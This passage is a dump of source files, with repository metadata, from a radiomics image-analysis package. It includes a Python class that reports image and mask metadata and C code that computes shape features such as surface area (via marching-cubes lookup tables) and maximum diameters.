return 1;\n }\n\n if (PyArray_NDIM(mask_arr) != 3 || PyArray_NDIM(spacing_arr) != 1)\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Expected a 3D array for mask, 1D for spacing.\");\n return 2;\n }\n\n if ( !PyArray_IS_C_CONTIGUOUS(mask_arr) || !PyArray_IS_C_CONTIGUOUS(spacing_arr))\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Expecting input arrays to be C-contiguous.\");\n return 3;\n }\n\n if (PyArray_DIM(spacing_arr, 0) != 3)\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Expecting spacing array to have shape (3,).\");\n return 4;\n }\n\n // Get sizes of the arrays\n size[2] = (int)PyArray_DIM(mask_arr, 2);\n size[1] = (int)PyArray_DIM(mask_arr, 1);\n size[0] = (int)PyArray_DIM(mask_arr, 0);\n\n strides[2] = (int)(PyArray_STRIDE(mask_arr, 2) / PyArray_ITEMSIZE(mask_arr));\n strides[1] = (int)(PyArray_STRIDE(mask_arr, 1) / PyArray_ITEMSIZE(mask_arr));\n strides[0] = (int)(PyArray_STRIDE(mask_arr, 0) / PyArray_ITEMSIZE(mask_arr));\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6926302909851074, "alphanum_fraction": 0.6951767802238464, "avg_line_length": 31.25120735168457, "blob_id": "e75f68b7e461b1262c16629dad9c31f2997a73df", "content_id": "9e8dfdeca02f0ffce00a08d7c3cdb4d0c11d3c70", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6676, "license_type": "permissive", "max_line_length": 138, "num_lines": 207, "path": "/radiomics/generalinfo.py", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "import collections\nimport logging\n\nimport numpy\nimport pywt\nimport SimpleITK as sitk\nimport six\n\nimport radiomics\n\n\nclass GeneralInfo():\n def __init__(self, imagePath, maskPath, resampledMask, settings, enabledImageTypes):\n self.logger = logging.getLogger(self.__module__)\n\n self.elements = self._getElementNames()\n\n if isinstance(imagePath, six.string_types):\n self.image = sitk.ReadImage(imagePath)\n elif isinstance(imagePath, sitk.Image):\n self.image = imagePath\n else:\n self.logger.warning('Error reading image Filepath or SimpleITK object')\n self.image = None\n\n if isinstance(maskPath, six.string_types):\n self.mask = sitk.ReadImage(maskPath)\n elif isinstance(maskPath, sitk.Image):\n self.mask = maskPath\n else:\n self.logger.warning('Error reading mask Filepath or SimpleITK object')\n self.mask = None\n\n self.resampledMask = resampledMask\n\n self._settings = settings\n self._enabledImageTypes = enabledImageTypes\n\n self.label = self._settings.get('label', 1)\n\n if resampledMask is not None:\n self.lssif = sitk.LabelShapeStatisticsImageFilter()\n self.lssif.Execute(resampledMask)\n else:\n self.lssif = None\n\n def _getElementNames(self):\n return [member[3: -5] for member in dir(self) if member.startswith('get') and member.endswith('Value')]\n\n def execute(self):\n \"\"\"\n Return a dictionary containing all general info items. Format is <info_item>:<value>, where the type\n of the value is preserved. For CSV format, this will result in conversion to string and quotes where necessary, for\n JSON, the values will be interpreted and stored as JSON strings.\n \"\"\"\n generalInfo = collections.OrderedDict()\n for el in self.elements:\n generalInfo[el] = getattr(self, 'get%sValue' % el)()\n return generalInfo\n\n def getBoundingBoxValue(self):\n \"\"\"\n Calculate and return the boundingbox extracted using the specified label.\n Elements 0, 1 and 2 are the x, y and z coordinates of the lower bound, respectively.\n Elements 3, 4 and 5 are the size of the bounding box in x, y and z direction, respectively.\n\n Values are based on the resampledMask.\n \"\"\"\n if self.lssif is not None:\n return self.lssif.GetBoundingBox(self.label)\n else:\n return None\n\n def getGeneralSettingsValue(self):\n \"\"\"\n Return a string representation of the general settings.\n Format is {<settings_name>:<value>, ...}.\n \"\"\"\n return self._settings\n\n def getImageHashValue(self):\n \"\"\"\n Returns the sha1 hash of the image. This enables checking whether two images are the same,\n regardless of the file location.\n\n If the reading of the image fails, an empty string is returned.\n \"\"\"\n if self.image is not None:\n return sitk.Hash(self.image)\n else:\n return None\n\n def getImageSpacingValue(self):\n \"\"\"\n Returns the original spacing (before any resampling) of the image.\n\n If the reading of the image fails, an empty string is returned.\n \"\"\"\n if self.image is not None:\n return self.image.GetSpacing()\n else:\n return None\n\n def getCenterOfMassIndexValue(self):\n \"\"\"\n Returns z, y and x coordinates of the center of mass of the ROI in terms of the image coordinate space (continuous index).\n\n Calculation is based on the original (non-resampled) mask.\n\n .. note::\n Because this represents the continuous index, the order of x, y and z is reversed, i.e. the first element is the z index, the second\n the y index and the last element is the x index.\n \"\"\"\n if self.mask is not None:\n maskArray = sitk.GetArrayFromImage(self.mask)\n maskCoordinates = numpy.array(numpy.where(maskArray == self.label))\n center_index = numpy.mean(maskCoordinates, axis=1)\n return tuple(center_index)\n else:\n return None\n\n def getCenterOfMassValue(self):\n \"\"\"\n Returns the real-world x, y and z coordinates of the center of mass of the ROI. This is the real-world transformation of\n :py:func:`~radiomics.generalinfo.getCenterOfMassIndexValue()`, taking into account the spacing, direction and origin of the mask.\n\n Calculation is based on the original (non-resampled) mask.\n \"\"\"\n if self.mask is not None:\n return self.mask.TransformContinuousIndexToPhysicalPoint(self.getCenterOfMassIndexValue())\n else:\n return None\n\n def getEnabledImageTypesValue(self):\n \"\"\"\n Return a string representation of the enabled image types and any custom settings for each image type.\n Format is {<imageType_name>:{<setting_name>:<value>, ...}, ...}.\n \"\"\"\n return self._enabledImageTypes\n\n def getMaskHashValue(self):\n \"\"\"\n Returns the sha1 hash of the mask. This enables checking whether two masks are the same,\n regardless of the file location.\n\n If the reading of the mask fails, an empty string is returned. Uses the original mask, specified in maskPath.\n \"\"\"\n if self.mask is not None:\n return sitk.Hash(self.mask)\n else:\n return None\n\n @classmethod\n def getVersionValue(self):\n \"\"\"\n Return the current version of this package.\n \"\"\"\n return radiomics.__version__\n\n @classmethod\n def getNumpyVersionValue(self):\n \"\"\"\n Return the current version of the numpy package, used for feature calculation.\n \"\"\"\n return numpy.__version__\n\n @classmethod\n def getSimpleITKVersionValue(self):\n \"\"\"\n Return the current version of the SimpleITK package, used for image processing.\n \"\"\"\n return sitk.Version().VersionString()\n\n @classmethod\n def getPyWaveletVersionValue(self):\n \"\"\"\n Return the current version of the PyWavelet package, used to apply the wavelet filter.\n \"\"\"\n return pywt.__version__\n\n def getVolumeNumValue(self):\n \"\"\"\n Calculate and return the number of zones within the mask for the specified label.\n A zone is defined as a group of connected neighbours that are segmented with the specified label, and a voxel is\n considered a neighbour using 26-connectedness for 3D and 8-connectedness for 2D.\n\n Values are based on the resampledMask.\n \"\"\"\n if self.resampledMask is not None:\n labelMap = (self.resampledMask == self.label)\n ccif = sitk.ConnectedComponentImageFilter()\n ccif.FullyConnectedOn()\n ccif.Execute(labelMap)\n return ccif.GetObjectCount()\n else:\n return None\n\n def getVoxelNumValue(self):\n \"\"\"\n Calculate and return the number of voxels that have been segmented using the specified label.\n\n Values are based on the resampledMask.\n \"\"\"\n if self.lssif is not None:\n return self.lssif.GetNumberOfPixels(self.label)\n else:\n return None\n" }, { "alpha_fraction": 0.2751407325267792, "alphanum_fraction": 0.43696877360343933, "avg_line_length": 45.575836181640625, "blob_id": "7f37142b6f0ad23e2a4a58260e4a4ef293fafa4b", "content_id": "cf7231332f8eba03f0621ff67bed8c3ec8391a7a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 18118, "license_type": "permissive", "max_line_length": 140, "num_lines": 389, "path": "/radiomics/src/cshape.c", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "#include \"cshape.h\"\n#include <math.h>\n#include <stdlib.h>\n\nint *generate_angles(int *size, int *strides, int *a_strides, int *Na, int *mDim);\n\n// Declare the look-up tables, these are filled at the bottom of this code file.\nstatic const int gridAngles[8][3];\n//static const int edgeTable[128]; // Not needed in this implementation\nstatic const int triTable[128][16];\nstatic const double vertList[12][3];\n\ndouble calculate_surfacearea(char *mask, int *size, int *strides, double *spacing)\n{\n int iz, iy, ix, i, t, d; // iterator indices\n unsigned char cube_idx; // cube identifier, 8 bits signifying which corners of the cube belong to the segmentation\n int a_idx; // Angle index (8 'angles', one pointing to each corner of the marching cube\n double sum;\n double surfaceArea = 0; // Total surface area\n double a[3], b[3], c[3]; // 2 points of the triangle, relative to the third, and the cross product vector\n\n // Iterate over all voxels, do not include last voxels in the three dimensions, as the cube includes voxels at pos +1\n for (iz = 0; iz < (size[0] - 1); iz++)\n {\n for (iy = 0; iy < (size[1] - 1); iy++)\n {\n for (ix = 0; ix < (size[2] - 1); ix++)\n {\n // Get current cube_idx by analyzing each point of the current cube\n cube_idx = 0;\n for (a_idx = 0; a_idx < 8; a_idx++)\n {\n i = (iz + gridAngles[a_idx][0]) * strides[0] +\n (iy + gridAngles[a_idx][1]) * strides[1] +\n (ix + gridAngles[a_idx][2]) * strides[2];\n\n if (mask[i]) cube_idx |= (1 << a_idx);\n }\n\n // Isosurface is symmetrical around the midpoint, flip the number if > 128\n // This enables look-up tables to be 1/2 the size.\n if (cube_idx & 0x80) cube_idx ^= 0xff;\n\n // Exlcude cubes entirely outside or inside the segmentation. Also exclude potential invalid values (>= 128).\n if (cube_idx > 0 && cube_idx < 128)\n {\n t = 0;\n while (triTable[cube_idx][t*3] >= 0) // Exit loop when no more triangles are present (element at index = -1)\n {\n for (d = 0; d < 3; d++)\n {\n a[d] = vertList[triTable[cube_idx][t*3 + 1]][d] - vertList[triTable[cube_idx][t*3]][d];\n b[d] = vertList[triTable[cube_idx][t*3 + 2]][d] - vertList[triTable[cube_idx][t*3]][d];\n\n // Factor in the spacing\n a[d] *= spacing[d];\n b[d] *= spacing[d];\n }\n\n // Compute the cross-product\n c[0] = (a[1] * b[2]) - (b[1] * a[2]);\n c[1] = (a[2] * b[0]) - (b[2] * a[0]);\n c[2] = (a[0] * b[1]) - (b[0] * a[1]);\n\n // Get the square\n c[0] = c[0] * c[0];\n c[1] = c[1] * c[1];\n c[2] = c[2] * c[2];\n\n // Compute the surface, which is equal to 1/2 magnitude of the cross product, where\n // The magnitude is obtained by calculating the euclidean distance between (0, 0, 0)\n // and the location of c\n sum = c[0] + c[1] + c[2];\n sum = sqrt(sum);\n sum = 0.5 * sum;\n surfaceArea += sum;\n t++;\n }\n }\n }\n }\n }\n return surfaceArea;\n}\n\nint calculate_diameter(char *mask, int *size, int *strides, double *spacing, int Ns, double *diameters)\n{\n int iz, iy, ix, i, j;\n int a_idx, d_idx;\n int Na, mDim;\n int *angles;\n int a_strides[3];\n\n int *stack;\n int stack_top = -1;\n\n int idx, jz, jy, jx;\n double dz, dy, dx;\n double distance;\n\n angles = generate_angles(size, strides, a_strides, &Na, &mDim);\n stack = (int *)calloc(Ns, sizeof(int));\n\n // First, get all the voxels on the border\n i = 0;\n // Iterate over all voxels in a row - column - slice order\n // As the mask is padded with 0's, no voxels on the edge of the image are part of the mask, so skip those...\n for (iz = 1; iz < size[0] - 1; iz++)\n {\n for (iy = 1; iy < size[1] - 1; iy++)\n {\n for (ix = 1; ix < size[2] - 1; ix++)\n {\n i = iz * strides[0] +\n iy * strides[1] +\n ix * strides[2];\n if (mask[i])\n {\n for (a_idx = 0; a_idx < Na; a_idx++)\n {\n j = i;\n for (d_idx = 0; d_idx < mDim; d_idx++)\n {\n j += angles[a_idx * mDim + d_idx] * a_strides[d_idx];\n }\n\n if (mask[j] == 0)\n {\n // neighbour not part of ROI, i.e. 'i' is border voxel\n if (stack_top >= Ns) return 0; // index out of bounds\n stack[++stack_top] = i;\n break;\n }\n }\n }\n }\n }\n\t}\n stack_top++; // increment by 1, so when the first item is popped, it is the last item entered\n\n\tfree(angles);\n\n diameters[0] = 0;\n diameters[1] = 0;\n diameters[2] = 0;\n diameters[3] = 0;\n\n while (stack_top > 0)\n {\n // pop the last item from the stack, this prevents double processing and comparing the same voxels\n i = stack[--stack_top];\n iz = (i / strides[0]);\n iy = (i % strides[0]) / strides[1];\n ix = (i % strides[0]) % strides[1];\n for (idx = 0; idx < stack_top; idx++) // calculate distance to all other voxels\n {\n j = stack[idx];\n\t jz = (j / strides[0]);\n jy = (j % strides[0]) / strides[1];\n jx = (j % strides[0]) % strides[1];\n\n dz = (double)(iz - jz) * spacing[0];\n dy = (double)(iy - jy) * spacing[1];\n dx = (double)(ix - jx) * spacing[2];\n\n dz *= dz;\n dy *= dy;\n dx *= dx;\n\n distance = dz + dy + dx;\n if (iz == jz && distance > diameters[0]) diameters[0] = distance;\n if (iy == jy && distance > diameters[1]) diameters[1] = distance;\n if (ix == jx && distance > diameters[2]) diameters[2] = distance;\n if (distance > diameters[3]) diameters[3] = distance;\n }\n }\n free(stack);\n\n diameters[0] = sqrt(diameters[0]);\n diameters[1] = sqrt(diameters[1]);\n diameters[2] = sqrt(diameters[2]);\n diameters[3] = sqrt(diameters[3]);\n\n return 1;\n}\n\nint *generate_angles(int *size, int *strides, int *a_strides, int *Na, int *mDim)\n{\n static int *angles; // return value, declare static so it can be returned\n\n int offsets[3] = {-1, 0, 1}; // distance 1, both directions\n int a_idx, d_idx, a_offset, stride;\n\n // First, determine how many 'moving' dimensions there are, this determines the number of distinct angles to generate\n // Na = 3 ** NDIM(Size > 3) - 1, i.e. each dimension triples the number of angles, -1 to exclude (0, 0, 0)\n *Na = 1;\n *mDim = 0;\n for (d_idx = 0; d_idx < 3; d_idx++) // assume mask is 3D\n {\n if (size[d_idx] > 3) // mask is padded with 0's in all directions, i.e. bounding box size = size - 2\n {\n // Dimension is a moving dimension\n a_strides[*mDim] = strides[d_idx];\n *Na *= 3;\n (*mDim)++;\n }\n }\n (*Na)--; // Don't generate angle for (0, 0, 0)\n\n // Initialize array to hold the angles\n angles = (int *)calloc(*Na * *mDim, sizeof(int));\n\n // Fill the angles array\n stride = 1;\n for (d_idx = 0; d_idx < *mDim; d_idx++) // Iterate over all moving dimensions\n {\n a_offset = 0;\n for (a_idx = 0; a_idx < *Na; a_idx++)\n {\n if (a_idx == *Na / 2) a_offset = 1; // Skip (0, 0, 0) angle\n\n angles[a_idx * *mDim + d_idx] = offsets[((a_idx + a_offset) / stride) % 3];\n }\n stride *= 3; // For next dimension, multiply stride by 3 (length offsets) --> {1, 3, 9, ...}\n }\n return angles;\n}\n\n// gridAngles define the 8 corners of the marching cube, relative to the origin of the cube\nstatic const int gridAngles[8][3] = { { 0, 0, 0 }, { 0, 0, 1 }, { 0, 1, 1 }, {0, 1, 0}, { 1, 0, 0 }, {1, 0, 1 }, { 1, 1, 1 }, { 1, 1, 0 } };\n\n// edgeTable defines which edges contain intersection points, for which the exact intersection point has to be\n// interpolated. However, as the intersection point is always 0.5, this can be defined beforehand, and this table is not\n// needed\n/*static const int edgeTable[128] = {\n 0x000, 0x109, 0x203, 0x30a, 0x406, 0x50f, 0x605, 0x70c, 0x80c, 0x905, 0xa0f, 0xb06, 0xc0a, 0xd03, 0xe09, 0xf00,\n 0x190, 0x099, 0x393, 0x29a, 0x596, 0x49f, 0x795, 0x69c, 0x99c, 0x895, 0xb9f, 0xa96, 0xd9a, 0xc93, 0xf99, 0xe90,\n 0x230, 0x339, 0x033, 0x13a, 0x636, 0x73f, 0x435, 0x53c, 0xa3c, 0xb35, 0x83f, 0x936, 0xe3a, 0xf33, 0xc39, 0xd30,\n 0x3a0, 0x2a9, 0x1a3, 0x0aa, 0x7a6, 0x6af, 0x5a5, 0x4ac, 0xbac, 0xaa5, 0x9af, 0x8a6, 0xfaa, 0xea3, 0xda9, 0xca0,\n 0x460, 0x569, 0x663, 0x76a, 0x066, 0x16f, 0x265, 0x36c, 0xc6c, 0xd65, 0xe6f, 0xf66, 0x86a, 0x963, 0xa69, 0xb60,\n 0x5f0, 0x4f9, 0x7f3, 0x6fa, 0x1f6, 0x0ff, 0x3f5, 0x2fc, 0xdfc, 0xcf5, 0xfff, 0xef6, 0x9fa, 0x8f3, 0xbf9, 0xaf0,\n 0x650, 0x759, 0x453, 0x55a, 0x256, 0x35f, 0x055, 0x15c, 0xe5c, 0xf55, 0xc5f, 0xd56, 0xa5a, 0xb53, 0x859, 0x950,\n 0x7c0, 0x6c9, 0x5c3, 0x4ca, 0x3c6, 0x2cf, 0x1c5, 0x0cc, 0xfcc, 0xec5, 0xdcf, 0xcc6, 0xbca, 0xac3, 0x9c9, 0x8c0\n};*/\n\n// triTable defines which triangles (defined by their points as defined in vertList) are present in the cube.\n// The first dimension indicates the specific cube to look up, the second dimension contains sets of 3 points (1 for\n// each triangle), with the elements set to -1 after all triangles have been defined (max. no of triangles: 5)\nstatic const int triTable[128][16] = {\n { -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 3, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 1, 9, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 8, 3, 9, 8, 1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 3, 1, 2, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 2, 10, 0, 2, 9, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 8, 3, 2, 10, 8, 10, 9, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 11, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 11, 2, 8, 11, 0, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 9, 0, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 11, 2, 1, 9, 11, 9, 8, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 10, 1, 11, 10, 3, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 10, 1, 0, 8, 10, 8, 11, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 9, 0, 3, 11, 9, 11, 10, 9, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 8, 10, 10, 8, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 7, 8, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 3, 0, 7, 3, 4, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 1, 9, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 1, 9, 4, 7, 1, 7, 3, 1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 10, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 4, 7, 3, 0, 4, 1, 2, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 2, 10, 9, 0, 2, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 10, 9, 2, 9, 7, 2, 7, 3, 7, 9, 4, -1, -1, -1, -1 },\n { 8, 4, 7, 3, 11, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 11, 4, 7, 11, 2, 4, 2, 0, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 0, 1, 8, 4, 7, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 7, 11, 9, 4, 11, 9, 11, 2, 9, 2, 1, -1, -1, -1, -1 },\n { 3, 10, 1, 3, 11, 10, 7, 8, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 11, 10, 1, 4, 11, 1, 0, 4, 7, 11, 4, -1, -1, -1, -1 },\n { 4, 7, 8, 9, 0, 11, 9, 11, 10, 11, 0, 3, -1, -1, -1, -1 },\n { 4, 7, 11, 4, 11, 9, 9, 11, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 4, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 4, 0, 8, 3, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 5, 4, 1, 5, 0, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 8, 5, 4, 8, 3, 5, 3, 1, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 10, 9, 5, 4, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 0, 8, 1, 2, 10, 4, 9, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 2, 10, 5, 4, 2, 4, 0, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 10, 5, 3, 2, 5, 3, 5, 4, 3, 4, 8, -1, -1, -1, -1 },\n { 9, 5, 4, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 11, 2, 0, 8, 11, 4, 9, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 5, 4, 0, 1, 5, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 1, 5, 2, 5, 8, 2, 8, 11, 4, 8, 5, -1, -1, -1, -1 },\n { 10, 3, 11, 10, 1, 3, 9, 5, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 9, 5, 0, 8, 1, 8, 10, 1, 8, 11, 10, -1, -1, -1, -1 },\n { 5, 4, 0, 5, 0, 11, 5, 11, 10, 11, 0, 3, -1, -1, -1, -1 },\n { 5, 4, 8, 5, 8, 10, 10, 8, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 7, 8, 5, 7, 9, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 3, 0, 9, 5, 3, 5, 7, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 7, 8, 0, 1, 7, 1, 5, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 5, 3, 3, 5, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 7, 8, 9, 5, 7, 10, 1, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 1, 2, 9, 5, 0, 5, 3, 0, 5, 7, 3, -1, -1, -1, -1 },\n { 8, 0, 2, 8, 2, 5, 8, 5, 7, 10, 5, 2, -1, -1, -1, -1 },\n { 2, 10, 5, 2, 5, 3, 3, 5, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 7, 9, 5, 7, 8, 9, 3, 11, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 7, 9, 7, 2, 9, 2, 0, 2, 7, 11, -1, -1, -1, -1 },\n { 2, 3, 11, 0, 1, 8, 1, 7, 8, 1, 5, 7, -1, -1, -1, -1 },\n { 11, 2, 1, 11, 1, 7, 7, 1, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 8, 8, 5, 7, 10, 1, 3, 10, 3, 11, -1, -1, -1, -1 },\n { 5, 7, 0, 5, 0, 9, 7, 11, 0, 1, 0, 10, 11, 10, 0, -1 },\n { 11, 10, 0, 11, 0, 3, 10, 5, 0, 8, 0, 7, 5, 7, 0, -1 },\n { 11, 10, 5, 7, 11, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 6, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 3, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 0, 1, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 8, 3, 1, 9, 8, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 6, 5, 2, 6, 1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 6, 5, 1, 2, 6, 3, 0, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 6, 5, 9, 0, 6, 0, 2, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 9, 8, 5, 8, 2, 5, 2, 6, 3, 2, 8, -1, -1, -1, -1 },\n { 2, 3, 11, 10, 6, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 11, 0, 8, 11, 2, 0, 10, 6, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 1, 9, 2, 3, 11, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 10, 6, 1, 9, 2, 9, 11, 2, 9, 8, 11, -1, -1, -1, -1 },\n { 6, 3, 11, 6, 5, 3, 5, 1, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 11, 0, 11, 5, 0, 5, 1, 5, 11, 6, -1, -1, -1, -1 },\n { 3, 11, 6, 0, 3, 6, 0, 6, 5, 0, 5, 9, -1, -1, -1, -1 },\n { 6, 5, 9, 6, 9, 11, 11, 9, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 10, 6, 4, 7, 8, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 3, 0, 4, 7, 3, 6, 5, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 9, 0, 5, 10, 6, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 6, 5, 1, 9, 7, 1, 7, 3, 7, 9, 4, -1, -1, -1, -1 },\n { 6, 1, 2, 6, 5, 1, 4, 7, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 5, 5, 2, 6, 3, 0, 4, 3, 4, 7, -1, -1, -1, -1 },\n { 8, 4, 7, 9, 0, 5, 0, 6, 5, 0, 2, 6, -1, -1, -1, -1 },\n { 7, 3, 9, 7, 9, 4, 3, 2, 9, 5, 9, 6, 2, 6, 9, -1 },\n { 3, 11, 2, 7, 8, 4, 10, 6, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 10, 6, 4, 7, 2, 4, 2, 0, 2, 7, 11, -1, -1, -1, -1 },\n { 0, 1, 9, 4, 7, 8, 2, 3, 11, 5, 10, 6, -1, -1, -1, -1 },\n { 9, 2, 1, 9, 11, 2, 9, 4, 11, 7, 11, 4, 5, 10, 6, -1 },\n { 8, 4, 7, 3, 11, 5, 3, 5, 1, 5, 11, 6, -1, -1, -1, -1 },\n { 5, 1, 11, 5, 11, 6, 1, 0, 11, 7, 11, 4, 0, 4, 11, -1 },\n { 0, 5, 9, 0, 6, 5, 0, 3, 6, 11, 6, 3, 8, 4, 7, -1 },\n { 6, 5, 9, 6, 9, 11, 4, 7, 9, 7, 11, 9, -1, -1, -1, -1 },\n { 10, 4, 9, 6, 4, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 10, 6, 4, 9, 10, 0, 8, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 0, 1, 10, 6, 0, 6, 4, 0, -1, -1, -1, -1, -1, -1, -1 },\n { 8, 3, 1, 8, 1, 6, 8, 6, 4, 6, 1, 10, -1, -1, -1, -1 },\n { 1, 4, 9, 1, 2, 4, 2, 6, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 0, 8, 1, 2, 9, 2, 4, 9, 2, 6, 4, -1, -1, -1, -1 },\n { 0, 2, 4, 4, 2, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 8, 3, 2, 8, 2, 4, 4, 2, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 4, 9, 10, 6, 4, 11, 2, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 2, 2, 8, 11, 4, 9, 10, 4, 10, 6, -1, -1, -1, -1 },\n { 3, 11, 2, 0, 1, 6, 0, 6, 4, 6, 1, 10, -1, -1, -1, -1 },\n { 6, 4, 1, 6, 1, 10, 4, 8, 1, 2, 1, 11, 8, 11, 1, -1 },\n { 9, 6, 4, 9, 3, 6, 9, 1, 3, 11, 6, 3, -1, -1, -1, -1 },\n { 8, 11, 1, 8, 1, 0, 11, 6, 1, 9, 1, 4, 6, 4, 1, -1 },\n { 3, 11, 6, 3, 6, 0, 0, 6, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 6, 4, 8, 11, 6, 8, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 7, 10, 6, 7, 8, 10, 8, 9, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 7, 3, 0, 10, 7, 0, 9, 10, 6, 7, 10, -1, -1, -1, -1 },\n { 10, 6, 7, 1, 10, 7, 1, 7, 8, 1, 8, 0, -1, -1, -1, -1 },\n { 10, 6, 7, 10, 7, 1, 1, 7, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 6, 1, 6, 8, 1, 8, 9, 8, 6, 7, -1, -1, -1, -1 },\n { 2, 6, 9, 2, 9, 1, 6, 7, 9, 0, 9, 3, 7, 3, 9, -1 },\n { 7, 8, 0, 7, 0, 6, 6, 0, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 7, 3, 2, 6, 7, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 3, 11, 10, 6, 8, 10, 8, 9, 8, 6, 7, -1, -1, -1, -1 },\n { 2, 0, 7, 2, 7, 11, 0, 9, 7, 6, 7, 10, 9, 10, 7, -1 },\n { 1, 8, 0, 1, 7, 8, 1, 10, 7, 6, 7, 10, 2, 3, 11, -1 },\n { 11, 2, 1, 11, 1, 7, 10, 6, 1, 6, 7, 1, -1, -1, -1, -1 },\n { 8, 9, 6, 8, 6, 7, 9, 1, 6, 11, 6, 3, 1, 3, 6, -1 },\n { 0, 9, 1, 11, 6, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 